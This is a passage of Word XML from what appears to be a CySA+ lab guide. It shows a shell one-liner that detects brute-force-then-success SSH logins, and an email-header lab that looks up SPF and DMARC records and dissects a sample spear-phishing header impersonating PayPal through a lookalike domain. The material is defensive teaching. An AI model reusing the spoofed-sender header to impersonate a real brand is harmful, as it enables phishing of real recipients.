      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{"ts":"2026-05-13T08:00:06","src":"203.0.113.7","event":"ssh_success","user":"root"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{"ts":"2026-05-13T08:00:30","src":"198.51.100.4","event":"ssh_fail","user":"alice"}</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jq -r 'select(.event=="ssh_fail") | .src' events.json | sort | uniq -c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>jq -r 'select(.event=="ssh_success") | "\(.ts) \(.src) \(.user)"' events.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Build a one-line "detection rule"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>join -1 1 -2 1 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;(jq -r 'select(.event=="ssh_fail") | .src' events.json | sort -u) \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;(jq -r 'select(.event=="ssh_success") | .src' events.json | sort -u)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Any IP printed is on both sides — failed AND succeeded. That is a brute-force-success in one shell line.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Parse, aggregate, and correlate logs across multiple sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Build a brute-force-then-success detection by hand — the algorithm under every SIEM "use case".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Work with both unstructured syslog and structured JSON events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Move from raw log to actionable alert without leaving the shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Regex Generator (https://alfredang.github.io/regexgenerator/) — a browser tool that builds and tests regular expressions for log parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the Regex Generator to build and test the patterns you feed to grep/awk when correlating events across log sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to parse, aggregate, and correlate logs across multiple sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 8 — Email Header Analysis (SPF/DKIM/DMARC)</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analyse an email header for impersonation indicators and inspect the three authentication standards — SPF, DKIM, and DMARC — that determine whether a sender is forging the From address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will analyse an email header for impersonation indicators and inspect the three authentication standards — SPF, DKIM, and DMARC — that determine whether a sender is forging the From address. These are exam-blueprint items under CySA+ 1.3 (Email analysis — Header, Impersonation, DKIM, DMARC, SPF, Embedded links).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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 Web (MXToolbox)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install DNS tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y dnsutils</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Look up an SPF record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SPF lists the IPs/hosts allowed to send mail for a domain. It is a DNS TXT record starting with v=spf1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dig +short TXT google.com | grep spf1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dig +short TXT microsoft.com | grep spf1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Read a record like v=spf1 include:_spf.google.com ~all:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>include: — another SPF record to inherit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>~all — softfail anything else</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>-all — hard reject anything else (stronger)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Look up DKIM and DMARC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>DKIM signatures live at a selector subdomain (e.g. s1._domainkey.example.com). DMARC policy lives at _dmarc.example.com:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dig +short TXT _dmarc.google.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dig +short TXT _dmarc.paypal.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Read a DMARC record like v=DMARC1; p=reject; rua=mailto:...:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>p=none — monitor only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>p=quarantine — junk folder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>p=reject — bounce the mail (strongest)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Analyse a suspicious raw header</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Save the following spear-phishing-style header:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; /tmp/header.eml &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Return-Path: &lt;alerts@secur1ty-paypal.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Received: from mta-bad.example (mta-bad.example [203.0.113.99])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        by mx.gmail.com with ESMTPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        Mon, 13 May 2026 08:00:00 +0000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Received: from desktop-pc (unknown [10.0.0.99])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        by mta-bad.example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        Mon, 13 May 2026 07:59:50 +0000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>From: "PayPal Security" &lt;service@paypal.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Reply-To: refund-team@secur1ty-paypal.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>To: victim@example.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Subject: Urgent: Confirm your account</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Authentication-Results: mx.gmail.com;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  spf=fail (sender IP is 203.0.113.99) smtp.mailfrom=secur1ty-paypal.com;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  dkim=none header.i=@paypal.com;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  dmarc=fail (p=REJECT sp=REJECT dis=NONE) header.from=paypal.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Spot the indicators (CySA+ "Impersonation"):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>grep -E '^(From|Return-Path|Reply-To|Received|Authentication-Results)' /tmp/header.eml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Red flags:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>From = paypal.com but Return-Path = secur1ty-paypal.com (homograph / lookalike).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reply-To points to the attacker domain, not the brand.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Received chain starts at desktop-pc 10.0.0.99 — not a corporate MTA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Authentication-Results = spf=fail, dkim=none, dmarc=fail.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Each row in Authentication-Results is a separate verdict; all three failing is a confirmed forgery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Trace the Received chain to find the true origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Received headers are stacked top-down; the lowest one is the original. Print them in order:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tac /tmp/header.eml | grep -E '^Received'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
